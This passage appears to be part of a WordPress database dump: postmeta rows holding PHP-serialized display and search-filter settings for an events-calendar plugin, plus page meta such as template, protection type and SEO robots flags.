Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:6:\"slider\";a:23:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"timeline\";a:15:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:14:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}}'),(137401,264441,'sf-options','a:11:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(137402,264441,'sf_status','0'),(137403,264441,'sf_display_label','0'),(137404,264441,'show_past_events','1'),(137405,264441,'show_only_past_events','0'),(137406,264441,'show_only_ongoing_events','0'),(137407,264440,'_wp_page_template','default'),(137408,264440,'passster_activate_global_protection',NULL),(137409,264440,'passster_activate_protection',NULL),(137410,264440,'passster_protection_type','password'),(137411,264440,'boldgrid_hide_page_title','0'),(137412,264440,'boldgrid_in_page_containers','1'),(137413,264440,'bgseo_robots_index','index'),(137414,264440,'bgseo_robots_follow','follow'),(137415,264443,'protect_children',''),(137416,264443,'_edit_lock','1620745904:2'),(137417,264443,'_edit_last','2'),(137418,264444,'protect_children',''),(137419,264444,'label',''),(137420,264444,'category','112'),(137421,264444,'location',''),(137422,264444,'organizer',''),(137423,264444,'tag',''),(137424,264444,'author',''),(137425,264444,'skin','monthly_view'),(137426,264444,'sk-options','a:18:{s:4:\"list\";a:30:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";}s:4:\"grid\";a:32:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:6:\"agenda\";a:15:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:13:\"full_calendar\";a:25:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"yearly_view\";a:13:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:12:\"monthly_view\";a:11:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:11:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"weekly_view\";a:11:{s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:9:\"timetable\";a:15:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:7:\"masonry\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:5:\"cover\";a:11:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"264605\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:9:\"countdown\";a:11:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:14:\"available_spot\";a:6:{s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"carousel\";a:21:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:6:\"slider\";a:23:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"timeline\";a:15:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:14:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}}'),(137427,264444,'sf-options','a:11:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\